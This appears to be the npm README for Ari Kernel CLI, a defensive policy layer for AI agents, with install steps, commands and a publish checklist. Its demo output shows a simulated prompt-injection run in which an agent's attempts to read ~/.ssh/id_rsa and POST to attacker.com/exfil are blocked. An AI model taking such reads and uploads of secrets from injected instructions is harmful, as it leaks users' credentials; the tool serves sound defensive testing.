Package Exports
This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (@arikernel/cli) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.
Readme
Ari Kernel CLI
Runtime security layer for AI agents — enforces policy on every tool call to block prompt injection, data exfiltration, and unsafe actions.
npm install -g @arikernel/cliarikernel simulate prompt-injection ALLOWED web_request(https://example.com)
BLOCKED read_file(~/.ssh/id_rsa)
Behavioral rule triggered. Run quarantined.
BLOCKED http_post(https://attacker.com/exfil)
Run in restricted mode. Egress denied.GitHub — if this is useful, consider giving it a star.
Install
Global (recommended)
npm install -g @arikernel/cliThen run the full forensic demo:
arikernel simulate prompt-injection
arikernel trace --latest
arikernel replay --latest --stepnpx (no install)
npx @arikernel/cli --help
npx @arikernel/cli initLocal dev
git clone https://github.com/AriKernel/arikernel.git
cd AriKernel
pnpm install
pnpm build
pnpm ari --helpCommands
| Command | Description |
|---|---|
arikernel simulate [type] |
Run attack simulations (prompt-injection, data-exfiltration, tool-escalation) |
arikernel trace [runId] |
Display security execution trace from audit log |
arikernel replay [runId] |
Replay a recorded session step by step |
arikernel replay-trace <file> |
Replay a JSON trace file through a fresh kernel |
arikernel sidecar |
Start sidecar proxy (default port 8787) |
arikernel run |
Start the firewall in run mode |
arikernel policy <file> |
Validate a policy YAML file |
arikernel init |
Generate a starter arikernel.policy.yaml |
All forensic commands default to ./arikernel-audit.db. Override with --db <path>.
Sidecar options
arikernel sidecar --policy ./arikernel.policy.yaml --port 8787 --audit-log ./sidecar-audit.dbReplay-trace options
arikernel replay-trace ./trace.json --verbose
arikernel replay-trace ./trace.json --preset workspace-assistant # what-if analysis
arikernel replay-trace ./trace.json --json # machine-readable outputTip: If
--latestpicks a stale run, deletearikernel-audit.dband re-simulate.
Requirements
- Node.js >= 20
npm package
The package is published as @arikernel/cli. The bin field ensures the command is arikernel:
npm install -g @arikernel/cli
arikernel --helpPublish checklist
Pre-publish verification
npm whoami
npm access ls-packagesBuild and test
pnpm build
pnpm testPublish the CLI
The CLI bundles all @arikernel/* packages at build time, so only the CLI itself needs publishing.
The library packages (@arikernel/core, @arikernel/runtime, etc.) are published separately for developers who use the runtime API directly.
# Library packages (for developers using the runtime API)
pnpm --filter @arikernel/core publish --no-git-checks
pnpm --filter @arikernel/taint-tracker publish --no-git-checks
pnpm --filter @arikernel/policy-engine publish --no-git-checks
pnpm --filter @arikernel/tool-executors publish --no-git-checks
pnpm --filter @arikernel/audit-log publish --no-git-checks
pnpm --filter @arikernel/runtime publish --no-git-checks
pnpm --filter @arikernel/attack-sim publish --no-git-checks
pnpm --filter @arikernel/adapters publish --no-git-checks
# CLI (self-contained, bundles all @arikernel/* deps)
pnpm --filter @arikernel/cli publish --no-git-checksNote:
@arikernel/sidecar,@arikernel/control-plane,@arikernel/mcp-adapter, and@arikernel/benchmarksare repo-only packages (private). They are bundled into the CLI and not published separately.
--no-git-checksis needed because pnpm replacesworkspace:*with real versions at publish time regardless of git state.
Post-publish verification
npm view @arikernel/cli version license description
npm install -g @arikernel/cli
arikernel --helpLicense
See LICENSE.md for usage terms.